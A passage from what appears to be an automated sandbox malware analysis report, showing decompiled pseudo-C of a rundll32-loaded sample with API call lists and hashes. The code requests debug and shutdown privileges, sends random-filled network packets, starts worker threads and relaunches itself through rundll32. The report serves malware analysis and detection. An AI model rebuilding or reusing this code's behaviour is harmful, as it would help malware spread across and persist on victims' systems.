                                                                                                                                                  								_v5 = 0;
                                                                                                                                                  							} else {
                                                                                                                                                  								_v5 = E04772344(_t101, _t115 - _t101 + _t120, _a16);
                                                                                                                                                  							}
                                                                                                                                                  							goto L20;
                                                                                                                                                  						}
                                                                                                                                                  						_push(0);
                                                                                                                                                  						_push(0xffff);
                                                                                                                                                  						_push(_t120 + _t115);
                                                                                                                                                  					}
                                                                                                                                                  					goto L20;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L3;
                                                                                                                                                  				}
                                                                                                                                                  				do {
                                                                                                                                                  					L3:
                                                                                                                                                  					 *((char*)(_t105 + _t137 + 0x54)) = rand();
                                                                                                                                                  					_t137 = _t137 + 1;
                                                                                                                                                  				} while (_t137 <  *((intOrPtr*)(_t105 + 0x40)));
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}





























                                                                                                                                                  0x0477249a
                                                                                                                                                  0x0477249b
                                                                                                                                                  0x047724ab
                                                                                                                                                  0x047724b8
                                                                                                                                                  0x047724ba
                                                                                                                                                  0x047724bf
                                                                                                                                                  0x047726ff
                                                                                                                                                  0x04772705
                                                                                                                                                  0x04772705
                                                                                                                                                  0x047724d2
                                                                                                                                                  0x047724d6
                                                                                                                                                  0x047726ec
                                                                                                                                                  0x047726f8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047726fe
                                                                                                                                                  0x047724dc
                                                                                                                                                  0x047724e1
                                                                                                                                                  0x047724e9
                                                                                                                                                  0x047724ea
                                                                                                                                                  0x047724ef
                                                                                                                                                  0x047724f5
                                                                                                                                                  0x047724fd
                                                                                                                                                  0x047724ff
                                                                                                                                                  0x04772505
                                                                                                                                                  0x0477250b
                                                                                                                                                  0x04772511
                                                                                                                                                  0x04772514
                                                                                                                                                  0x04772517
                                                                                                                                                  0x0477251c
                                                                                                                                                  0x0477251d
                                                                                                                                                  0x04772529
                                                                                                                                                  0x04772531
                                                                                                                                                  0x04772535
                                                                                                                                                  0x04772539
                                                                                                                                                  0x0477253c
                                                                                                                                                  0x04772543
                                                                                                                                                  0x04772546
                                                                                                                                                  0x0477254d
                                                                                                                                                  0x04772554
                                                                                                                                                  0x04772556
                                                                                                                                                  0x0477255d
                                                                                                                                                  0x0477256f
                                                                                                                                                  0x04772583
                                                                                                                                                  0x04772585
                                                                                                                                                  0x0477258a
                                                                                                                                                  0x047726dc
                                                                                                                                                  0x047726e6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047726e6
                                                                                                                                                  0x04772597
                                                                                                                                                  0x0477259d
                                                                                                                                                  0x0477259f
                                                                                                                                                  0x047725a5
                                                                                                                                                  0x047725a8
                                                                                                                                                  0x047725b1
                                                                                                                                                  0x047725b4
                                                                                                                                                  0x047725b8
                                                                                                                                                  0x047725bc
                                                                                                                                                  0x047725c0
                                                                                                                                                  0x047725c7
                                                                                                                                                  0x047725cb
                                                                                                                                                  0x047725cd
                                                                                                                                                  0x047725d3
                                                                                                                                                  0x047725d7
                                                                                                                                                  0x047725d8
                                                                                                                                                  0x047725f1
                                                                                                                                                  0x047725f3
                                                                                                                                                  0x047725f8
                                                                                                                                                  0x047726cc
                                                                                                                                                  0x047726d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047726d6
                                                                                                                                                  0x04772605
                                                                                                                                                  0x0477260f
                                                                                                                                                  0x04772617
                                                                                                                                                  0x0477262a
                                                                                                                                                  0x04772630
                                                                                                                                                  0x04772634
                                                                                                                                                  0x047726ba
                                                                                                                                                  0x047726c6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047726c6
                                                                                                                                                  0x0477264d
                                                                                                                                                  0x04772651
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772653
                                                                                                                                                  0x04772657
                                                                                                                                                  0x0477265d
                                                                                                                                                  0x0477265f
                                                                                                                                                  0x04772664
                                                                                                                                                  0x04772694
                                                                                                                                                  0x04772697
                                                                                                                                                  0x0477269b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477266c
                                                                                                                                                  0x0477266e
                                                                                                                                                  0x04772677
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772679
                                                                                                                                                  0x04772680
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772688
                                                                                                                                                  0x047726a3
                                                                                                                                                  0x047726b6
                                                                                                                                                  0x047726a5
                                                                                                                                                  0x047726b1
                                                                                                                                                  0x047726b1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047726a3
                                                                                                                                                  0x0477268a
                                                                                                                                                  0x0477268c
                                                                                                                                                  0x04772693
                                                                                                                                                  0x04772693
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477255f
                                                                                                                                                  0x0477255f
                                                                                                                                                  0x04772565
                                                                                                                                                  0x04772569
                                                                                                                                                  0x0477256a
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047724AF
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047724B8
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00001124,74CB4F20,?,?,?,0477471C,?,?,?,?,?), ref: 047724CD
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047724D0
                                                                                                                                                  • rand.MSVCRT ref: 047724E1
                                                                                                                                                  • htons.WS2_32(00001120), ref: 047724FF
                                                                                                                                                  • rand.MSVCRT ref: 0477255F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,0477471C,?,?,?,?,?), ref: 04772576
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 0477257D
                                                                                                                                                  • htons.WS2_32(0000015C), ref: 0477259F
                                                                                                                                                  • rand.MSVCRT ref: 047725CD
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,0477471C,?,?,?,?,?), ref: 047725E4
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047725EB
                                                                                                                                                  • memcpy.MSVCRT ref: 04772605
                                                                                                                                                  • memcpy.MSVCRT ref: 04772617
                                                                                                                                                  • send.WS2_32(?,00000000,0000111C,00000000), ref: 04772630
                                                                                                                                                  • send.WS2_32(?,?,00000168,00000000), ref: 0477264D
                                                                                                                                                  • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04772697
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0477471C,?,?,?,?,?), ref: 047726BF
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,0477471C,?,?,?,?,?), ref: 047726C6
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,0477471C,?,?,?,?,?), ref: 047726CF
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047726D6
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047726DF
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047726E6
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,0477471C,?,?,?,?,?), ref: 047726F1
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,0477471C,?,?,?,?,?), ref: 047726F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$rand$htonsmemcpysend$recv
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3700823678-0
                                                                                                                                                  • Opcode ID: 7e1b2b628074b8c50689ce7bdafae6eb56990819d530785f8f6f52ee8c802c2e
                                                                                                                                                  • Instruction ID: e489b2774c786951c552024bebca8509d4a4281ccb5da0925bafdf169160c8ce
                                                                                                                                                  • Opcode Fuzzy Hash: 7e1b2b628074b8c50689ce7bdafae6eb56990819d530785f8f6f52ee8c802c2e
                                                                                                                                                  • Instruction Fuzzy Hash: 9771C271600345EFEF249FA4CC49BAA7B64FF48700F548199FA15AB782D7B8E801CB64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 173 47779d7-47779ec call 4777897 176 47779ee-47779f7 call 477923f 173->176 177 47779fc-4777a03 call 4777f04 173->177 176->177 181 4777a05-4777a07 ExitProcess 177->181 182 4777a0d-4777a14 177->182 183 4777a16 call 4777e8e 182->183 184 4777a1b-4777acf call 47784ee call 47710a7 WSAStartup call 4776c5f * 2 InitializeCriticalSection call 477652f call 4777dd0 call 4778192 CreateEventW CreateThread 182->184 183->184 200 4777ad5-4777ae8 CreateThread 184->200 201 4777b99-4777ba0 184->201 204 4777aea-4777af1 200->204 205 4777af8-4777b0a call 4776cc8 200->205 202 4777ba2-4777baf call 477554a 201->202 203 4777bde-4777bf1 Sleep call 4778a23 201->203 202->203 217 4777bb1 202->217 213 4777bf6-4777c16 GetSystemDirectoryW 203->213 204->205 208 4777af3 call 4777146 204->208 215 4777b63-4777b93 call 4776cc8 CreateThread call 477a420 Sleep 205->215 216 4777b0c-4777b31 call 4776c5f call 47785fb 205->216 208->205 220 4777cc0-4777cc2 213->220 221 4777c1c-4777c30 lstrcatW 213->221 215->201 216->215 234 4777b33-4777b39 216->234 222 4777bb3-4777bcd 217->222 221->220 225 4777c36-4777c4b GetModuleFileNameW 221->225 222->222 226 4777bcf-4777bd9 call 477636b 222->226 225->220 229 4777c4d-4777c7a PathFindFileNameW wsprintfW 225->229 226->203 233 4777c7c-4777c80 229->233 233->233 235 4777c82-4777c87 233->235 236 4777b3c-4777b4c call 477a3b1 call 477796e 234->236 237 4777c8a-4777c8e 235->237 243 4777b4e-4777b56 call 4776e66 236->243 244 4777b5b-4777b61 236->244 237->237 239 4777c90-4777cba CreateProcessW ExitProcess 237->239 243->244 244->215 244->236
                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E047779D7(void* __ebx, void* __ecx, void* __edi, char _a4, signed int _a8, char _a12, int _a16) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                  				struct _STARTUPINFOW _v92;
                                                                                                                                                  				char _v304;
                                                                                                                                                  				short _v1652;
                                                                                                                                                  				short _v1976;
                                                                                                                                                  				short _v3212;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t60;
                                                                                                                                                  				intOrPtr _t63;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				int _t78;
                                                                                                                                                  				char* _t84;
                                                                                                                                                  				char* _t85;
                                                                                                                                                  				void* _t91;
                                                                                                                                                  				char _t108;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				long _t120;
                                                                                                                                                  				signed char* _t121;
                                                                                                                                                  				long _t122;
                                                                                                                                                  				signed int _t124;
                                                                                                                                                  				signed int _t127;
                                                                                                                                                  				intOrPtr _t128;
                                                                                                                                                  				void* _t132;
                                                                                                                                                  				intOrPtr* _t134;
                                                                                                                                                  				void* _t135;
                                                                                                                                                  
                                                                                                                                                  				_t118 = __ecx;
                                                                                                                                                  				_push(_t128);
                                                                                                                                                  				E04777897(__ecx, _t128);
                                                                                                                                                  				if(_a16 != 0xffffffff) {
                                                                                                                                                  					E0477923F(__ecx, _a4, _a8, _a12); // executed
                                                                                                                                                  				}
                                                                                                                                                  				_t60 = E04777F04(); // executed
                                                                                                                                                  				if(_t60 != 0) {
                                                                                                                                                  					ExitProcess(0);
                                                                                                                                                  				}
                                                                                                                                                  				_t142 =  *0x4787bc0 & 0x00000002;
                                                                                                                                                  				if(( *0x4787bc0 & 0x00000002) != 0) {
                                                                                                                                                  					E04777E8E(_t118, _t142); // executed
                                                                                                                                                  				}
                                                                                                                                                  				E047784EE(); // executed
                                                                                                                                                  				E047710A7(); // executed
                                                                                                                                                  				_a8 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_a16 = 0;
                                                                                                                                                  				_a4 = 0;
                                                                                                                                                  				__imp__#115(0x202, 0x47881e0); // executed
                                                                                                                                                  				_t63 = E04776C5F(0x24, E04776AA8, 0, 0xffff); // executed
                                                                                                                                                  				 *0x4787bb8 = _t63;
                                                                                                                                                  				 *0x4787b80 = E04776C5F(8, E047767F9, E0477682F, 0xff);
                                                                                                                                                  				 *0x4787b88 = 0;
                                                                                                                                                  				InitializeCriticalSection(0x4787b9c);
                                                                                                                                                  				E0477652F(_t118, _a12); // executed
                                                                                                                                                  				E04777DD0(_t118,  &_a8,  &_v8,  &_a16,  &_a4); // executed
                                                                                                                                                  				E04778192(); // executed
                                                                                                                                                  				_t72 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                  				_v24.dwThreadId = _t72;
                                                                                                                                                  				CreateThread(0, 0, E04778A6F, _t72, 0, 0); // executed
                                                                                                                                                  				if(( *0x4787b7c & 0x00000002) != 0) {
                                                                                                                                                  					CreateThread(0, 0, E047777D1, 0, 0, 0); // executed
                                                                                                                                                  					if(( *0x4787bc0 & 0x00000002) != 0 && ( *0x4787b7c & 0x00000001) != 0) {
                                                                                                                                                  						E04777146(_t118, _t128); // executed
                                                                                                                                                  					}
                                                                                                                                                  					E04776CC8( *0x4787b80);
                                                                                                                                                  					_t146 =  *0x4787bc0 & 0x00000004;
                                                                                                                                                  					if(( *0x4787bc0 & 0x00000004) != 0) {
                                                                                                                                                  						 *0x4787b88 = E04776C5F(4, E0477787C, 0, 0xff);
                                                                                                                                                  						_push( &_v304);
                                                                                                                                                  						_t108 = E047785FB(_t146);
                                                                                                                                                  						if(_t108 != 0) {
                                                                                                                                                  							_t134 =  &_v304;
                                                                                                                                                  							_a12 = _t108;
                                                                                                                                                  							do {
                                                                                                                                                  								E0477A3B1(_t118,  *_t134);
                                                                                                                                                  								if(E0477796E(_t118,  *_t134) != 0) {
                                                                                                                                                  									E04776E66(_t118,  *0x4787b88, _t134, 0);
                                                                                                                                                  								}
                                                                                                                                                  								_t134 = _t134 + 4;
                                                                                                                                                  								_t28 =  &_a12;
                                                                                                                                                  								 *_t28 = _a12 - 1;
                                                                                                                                                  							} while ( *_t28 != 0);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t128 =  *0x4787b88;
                                                                                                                                                  					E04776CC8(_t128);
                                                                                                                                                  					CreateThread(0, 0, E0477A1A9, 0, 0, 0); // executed
                                                                                                                                                  					E0477A420(_t118, _a16 * 0xea60); // executed
                                                                                                                                                  					Sleep(_a8 * 0xea60); // executed
                                                                                                                                                  				}
                                                                                                                                                  				if(( *0x4787b7c & 0x00000010) != 0) {
                                                                                                                                                  					_t91 = E0477554A(_t118,  &(_v92.dwFlags), 0x21); // executed
                                                                                                                                                  					if(_t91 != 0) {
                                                                                                                                                  						_t132 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_t121 = _t135 + _t132 - 0x2c;
                                                                                                                                                  							_t127 = 0x3e;
                                                                                                                                                  							_t124 = ( *_t121 & 0x000000ff) % _t127;
                                                                                                                                                  							_t132 = _t132 + 1;
                                                                                                                                                  							_t41 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + _t124; // 0x33323130
                                                                                                                                                  							 *_t121 =  *_t41;
                                                                                                                                                  						} while (_t132 < 0x20);
                                                                                                                                                  						_v24.dwProcessId = 0;
                                                                                                                                                  						E0477636B( &(_v92.dwFlags), _v24.dwThreadId); // executed
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				Sleep((_a4 + _v8) * 0xea60); // executed
                                                                                                                                                  				E04778A23();
                                                                                                                                                  				asm("int3");
                                                                                                                                                  				_push(_t135);
                                                                                                                                                  				_push(_t128);
                                                                                                                                                  				_t78 = GetSystemDirectoryW( &_v1976, 0x30c);
                                                                                                                                                  				if(_t78 != 0) {
                                                                                                                                                  					_t78 = lstrcatW( &_v1652, L"\\rundll32.exe");
                                                                                                                                                  					if(_t78 != 0) {
                                                                                                                                                  						_t78 = GetModuleFileNameW( *0x4787b98, 0x4787bc8, 0x30c);
                                                                                                                                                  						if(_t78 != 0) {
                                                                                                                                                  							wsprintfW( &_v3212, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1652, PathFindFileNameW(0x4787bc8), _a8);
                                                                                                                                                  							_t119 = 0x10;
                                                                                                                                                  							_t84 =  &_v24;
                                                                                                                                                  							do {
                                                                                                                                                  								 *_t84 = 0;
                                                                                                                                                  								_t84 = _t84 + 1;
                                                                                                                                                  								_t119 = _t119 - 1;
                                                                                                                                                  							} while (_t119 != 0);
                                                                                                                                                  							_t122 = 0x44;
                                                                                                                                                  							_t120 = _t122;
                                                                                                                                                  							_t85 =  &_v92;
                                                                                                                                                  							do {
                                                                                                                                                  								 *_t85 = 0;
                                                                                                                                                  								_t85 = _t85 + 1;
                                                                                                                                                  								_t120 = _t120 - 1;
                                                                                                                                                  							} while (_t120 != 0);
                                                                                                                                                  							_v92.cb = _t122;
                                                                                                                                                  							_t78 = CreateProcessW( &_v1652,  &_v3212, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                                                                                                                                  							ExitProcess(0);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t78;
                                                                                                                                                  			}





























                                                                                                                                                  0x047779d7
                                                                                                                                                  0x047779e1
                                                                                                                                                  0x047779e3
                                                                                                                                                  0x047779ec
                                                                                                                                                  0x047779f7
                                                                                                                                                  0x047779f7
                                                                                                                                                  0x047779fc
                                                                                                                                                  0x04777a03
                                                                                                                                                  0x04777a07
                                                                                                                                                  0x04777a07
                                                                                                                                                  0x04777a0d
                                                                                                                                                  0x04777a14
                                                                                                                                                  0x04777a16
                                                                                                                                                  0x04777a16
                                                                                                                                                  0x04777a1b
                                                                                                                                                  0x04777a20
                                                                                                                                                  0x04777a31
                                                                                                                                                  0x04777a34
                                                                                                                                                  0x04777a37
                                                                                                                                                  0x04777a3a
                                                                                                                                                  0x04777a3d
                                                                                                                                                  0x04777a50
                                                                                                                                                  0x04777a66
                                                                                                                                                  0x04777a75
                                                                                                                                                  0x04777a7a
                                                                                                                                                  0x04777a80
                                                                                                                                                  0x04777a89
                                                                                                                                                  0x04777a9e
                                                                                                                                                  0x04777aa3
                                                                                                                                                  0x04777aad
                                                                                                                                                  0x04777ac3
                                                                                                                                                  0x04777ac6
                                                                                                                                                  0x04777acf
                                                                                                                                                  0x04777adf
                                                                                                                                                  0x04777ae8
                                                                                                                                                  0x04777af3
                                                                                                                                                  0x04777af3
                                                                                                                                                  0x04777afe
                                                                                                                                                  0x04777b03
                                                                                                                                                  0x04777b0a
                                                                                                                                                  0x04777b1e
                                                                                                                                                  0x04777b29
                                                                                                                                                  0x04777b2a
                                                                                                                                                  0x04777b31
                                                                                                                                                  0x04777b33
                                                                                                                                                  0x04777b39
                                                                                                                                                  0x04777b3c
                                                                                                                                                  0x04777b3e
                                                                                                                                                  0x04777b4c
                                                                                                                                                  0x04777b56
                                                                                                                                                  0x04777b56
                                                                                                                                                  0x04777b5b
                                                                                                                                                  0x04777b5e
                                                                                                                                                  0x04777b5e
                                                                                                                                                  0x04777b5e
                                                                                                                                                  0x04777b3c
                                                                                                                                                  0x04777b31
                                                                                                                                                  0x04777b63
                                                                                                                                                  0x04777b69
                                                                                                                                                  0x04777b78
                                                                                                                                                  0x04777b84
                                                                                                                                                  0x04777b93
                                                                                                                                                  0x04777b93
                                                                                                                                                  0x04777ba0
                                                                                                                                                  0x04777ba8
                                                                                                                                                  0x04777baf
                                                                                                                                                  0x04777bb1
                                                                                                                                                  0x04777bb3
                                                                                                                                                  0x04777bb3
                                                                                                                                                  0x04777bbe
                                                                                                                                                  0x04777bbf
                                                                                                                                                  0x04777bc1
                                                                                                                                                  0x04777bc2
                                                                                                                                                  0x04777bc8
                                                                                                                                                  0x04777bca
                                                                                                                                                  0x04777bd6
                                                                                                                                                  0x04777bd9
                                                                                                                                                  0x04777bd9
                                                                                                                                                  0x04777baf
                                                                                                                                                  0x04777beb
                                                                                                                                                  0x04777bf1
                                                                                                                                                  0x04777bf6
                                                                                                                                                  0x04777bf7
                                                                                                                                                  0x04777c00
                                                                                                                                                  0x04777c0e
                                                                                                                                                  0x04777c16
                                                                                                                                                  0x04777c28
                                                                                                                                                  0x04777c30
                                                                                                                                                  0x04777c43
                                                                                                                                                  0x04777c4b
                                                                                                                                                  0x04777c6b
                                                                                                                                                  0x04777c76
                                                                                                                                                  0x04777c77
                                                                                                                                                  0x04777c7c
                                                                                                                                                  0x04777c7c
                                                                                                                                                  0x04777c7e
                                                                                                                                                  0x04777c7f
                                                                                                                                                  0x04777c7f
                                                                                                                                                  0x04777c84
                                                                                                                                                  0x04777c85
                                                                                                                                                  0x04777c87
                                                                                                                                                  0x04777c8a
                                                                                                                                                  0x04777c8a
                                                                                                                                                  0x04777c8c
                                                                                                                                                  0x04777c8d
                                                                                                                                                  0x04777c8d
                                                                                                                                                  0x04777cb0
                                                                                                                                                  0x04777cb3
                                                                                                                                                  0x04777cba
                                                                                                                                                  0x04777cba
                                                                                                                                                  0x04777c4b
                                                                                                                                                  0x04777c30
                                                                                                                                                  0x04777cc2

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 04777897: GetTickCount.KERNEL32 ref: 047778AF
                                                                                                                                                    • Part of subcall function 04777897: srand.MSVCRT ref: 047778B2
                                                                                                                                                    • Part of subcall function 04777897: GetTickCount.KERNEL32 ref: 047778B9
                                                                                                                                                    • Part of subcall function 04777897: GetModuleFileNameW.KERNEL32(04787BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,047779E8), ref: 04777926
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 04777A07
                                                                                                                                                    • Part of subcall function 0477923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,047779FC,?,?,?), ref: 0477927B
                                                                                                                                                    • Part of subcall function 0477923F: memcpy.MSVCRT ref: 04779294
                                                                                                                                                    • Part of subcall function 0477923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04779303
                                                                                                                                                    • Part of subcall function 0477923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 04779323
                                                                                                                                                  • WSAStartup.WS2_32(00000202,047881E0), ref: 04777A3D
                                                                                                                                                  • InitializeCriticalSection.KERNEL32(04787B9C,00000008,047767F9,0477682F,000000FF,00000024,04776AA8,00000000,0000FFFF), ref: 04777A80
                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 04777AAD
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,04778A6F,00000000,00000000,00000000), ref: 04777AC6
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,047777D1,00000000,00000000,00000000), ref: 04777ADF
                                                                                                                                                    • Part of subcall function 04777E8E: PathFileExistsW.KERNELBASE(?,?), ref: 04777EB1
                                                                                                                                                    • Part of subcall function 04777E8E: GetCurrentProcess.KERNEL32(?,?), ref: 04777EC3
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,0477A1A9,00000000,00000000,00000000), ref: 04777B78
                                                                                                                                                    • Part of subcall function 0477A420: GetProcessHeap.KERNEL32(00000008,00000004,74CB43E0,?,00000000,?,?,04777B89,000000FF), ref: 0477A436
                                                                                                                                                    • Part of subcall function 0477A420: HeapAlloc.KERNEL32(00000000,?,?,04777B89,000000FF), ref: 0477A439
                                                                                                                                                    • Part of subcall function 0477A420: CreateThread.KERNELBASE ref: 0477A454
                                                                                                                                                    • Part of subcall function 0477A420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,04777B89,000000FF), ref: 0477A463
                                                                                                                                                    • Part of subcall function 0477A420: HeapFree.KERNEL32(00000000,?,?,04777B89,000000FF), ref: 0477A466
                                                                                                                                                  • Sleep.KERNELBASE(?,000000FF), ref: 04777B93
                                                                                                                                                  • Sleep.KERNELBASE(?), ref: 04777BEB
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04777C0E
                                                                                                                                                  • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04777C28
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(04787BC8,0000030C), ref: 04777C43
                                                                                                                                                  • PathFindFileNameW.SHLWAPI(04787BC8,?), ref: 04777C51
                                                                                                                                                  • wsprintfW.USER32 ref: 04777C6B
                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 04777CB3
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 04777CBA
                                                                                                                                                    • Part of subcall function 0477554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,0477790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04775561
                                                                                                                                                    • Part of subcall function 0477554A: GetLastError.KERNEL32(?,?,?,0477790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,047779E8), ref: 0477556B
                                                                                                                                                    • Part of subcall function 0477554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,0477790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,047779E8), ref: 04775581
                                                                                                                                                    • Part of subcall function 0477554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,0477790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,047779E8), ref: 0477558E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess$FileHeapThread$CryptNameVirtual$AllocContextCountExitFreeModulePathSleepTick$AcquireCriticalCurrentDirectoryErrorEventExistsFindInitializeLastProtectRandomReleaseSectionStartupSystemlstrcatmemcpysrandwsprintf
                                                                                                                                                  • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                                                                                                  • API String ID: 1016975789-3730106045
                                                                                                                                                  • Opcode ID: 74a76338291bdc51646624c9c74f9dfee19501ac836dfc4882eb846b0fa700c6
                                                                                                                                                  • Instruction ID: 2508b4826a813aade01906874b4880cf0af98f6c8c2fd455c8a03e5ddf3e401f
                                                                                                                                                  • Opcode Fuzzy Hash: 74a76338291bdc51646624c9c74f9dfee19501ac836dfc4882eb846b0fa700c6
                                                                                                                                                  • Instruction Fuzzy Hash: F081D6B1540209BBFF14AFB4CD88EEE3B6DEF45358F948429F901A6251DA74FD448B60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E04777146(void* __ecx, void* __esi) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				void* _v32;
                                                                                                                                                  				char _v36;
                                                                                                                                                  				struct _PROCESS_INFORMATION _v52;
                                                                                                                                                  				struct _STARTUPINFOW _v120;
                                                                                                                                                  				short _v1680;
                                                                                                                                                  				void _v3728;
                                                                                                                                                  				short _v5776;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* _t56;
                                                                                                                                                  				void* _t57;
                                                                                                                                                  				int _t59;
                                                                                                                                                  				long* _t60;
                                                                                                                                                  				char _t62;
                                                                                                                                                  				char* _t64;
                                                                                                                                                  				char* _t66;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				char* _t73;
                                                                                                                                                  				int _t90;
                                                                                                                                                  				long _t95;
                                                                                                                                                  				void* _t99;
